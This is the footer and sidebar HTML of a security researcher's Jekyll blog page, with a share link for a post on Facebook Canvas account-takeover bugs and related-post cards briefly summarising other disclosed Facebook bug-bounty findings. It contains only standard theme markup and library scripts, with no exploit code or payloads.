        <a href="https://www.facebook.com/sharer/sharer.php?title=More%20secure%20Facebook%20Canvas%20:%20Tale%20of%20$126k%20worth%20of%20bugs%20that%20lead%20to%20Facebook%20Account%20Takeovers%20-%20Youssef%20Sammouda&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2Fmore-secure-facebook-canvas-applications-tale-of-126k-worth-of-bugs-that-lead-to-facebook-account-takeovers%2F" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        data-title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- panel -->
  
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">
  
    
      <div class="access">
        















        <!--

















-->
      </div>

      
        
        




      
    

    

</div>
  

</div>


<!-- tail -->

<div class="row">
  <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4 mt-5">
    
      
      <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->





  <div id="related-posts" class="mb-2 mb-sm-4">
    <h3 class="pt-2 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/disclose-unconfirmed-email-phone-of-a-facebook-user/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1624786389"
    data-df="ll"
    >
  Jun 27, 2021
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Disclose unconfirmed email/phone of a Facebook user</h3>
            <div class="text-muted small">
              <p>
                





                Description

This bug could have allowed an attacker to target Facebook users in order to potentially leak unconfirmed emails or phone numbers. A link should be visited by the targeted user in orde...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/oversightboard-com-site-wide-csrf-due-to-missing-checking/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1624786971"
    data-df="ll"
    >
  Jun 27, 2021
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Oversightboard.com site-wide CSRF due to missing checking</h3>
            <div class="text-muted small">
              <p>
                





                Description

This bug could allow an attacker to force a user in Oversightboard.com who visited his website, to make certain requests which would allow the deleting, editing or creating of data. Th...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/uploading-files-to-api-techprep-fb-com/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->





<em class="small"
    data-ts="1548158470"
    data-df="ll"
    >
  Jan 22, 2019
</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Uploading files to api.techprep.fb.com</h3>
            <div class="text-muted small">
              <p>
                





                This bug found in one of Facebook domains (api.techprep.fb.com) could allowed an attacker to upload files to the server. All filetypes were supported that could lead to XSS.

Reproduction Instructi...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


    
      
      <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/oversightboard-com-site-wide-csrf-due-to-missing-checking/" class="btn btn-outline-primary"
    prompt="Older">
    <p>Oversightboard.com site-wide CSRF due to missing checking</p>
  </a>
  

  
  <a href="/posts/multiple-bugs-allowed-malicious-android-applications-to-takeover-facebook-workplace-accounts/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>Multiple bugs allowed malicious Android Applications to takeover Facebook/Workplace accounts</p>
  </a>
  

</div>

    
      
      <!--  The comments switcher -->


    
  </div>
</div>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      


















    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    <!-- The Footer -->

<footer>
  <div class="container pl-lg-4 pr-lg-4">
    <div class="d-flex justify-content-between align-items-center text-muted ml-md-3 mr-md-3">
      <div class="footer-left">
        <p class="mb-0">
          © 2025
          <a href="https://www.linkedin.com/in/ysammouda">Youssef Sammouda</a>.
          
          <span data-toggle="tooltip" data-placement="top"
            title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
          
        </p>
      </div>

      <div class="footer-right">
        <p class="mb-0">Using <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
        </p>
      </div>
    </div>
  </div>
</footer>


    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    
      <div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true"
        data-animation="true" data-autohide="false">
        <div class="toast-header">
          <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close">
            <span aria-hidden="true">&times;</span>
          </button>
        </div>
        <div class="toast-body text-center pt-0">
          <p class="pl-2 pr-2 mb-3">A new version of content is available.</p>
          <button type="button" class="btn btn-primary" aria-label="Update">
            Update
          </button>
        </div>
      </div>
    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No results found.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup & clipboard -->
  

  







  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/lazysizes@5.3.2/lazysizes.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js"></script>






  

  

  







  
    

    

  



  
    

    

  



  
    

    

  



  
    

    

  




  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1.11.6/dayjs.min.js,npm/dayjs@1.11.6/locale/en.min.js,npm/dayjs@1.11.6/plugin/relativeTime.min.js,npm/dayjs@1.11.6/plugin/localizedFormat.min.js"></script>








<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>




  </body>

</html>

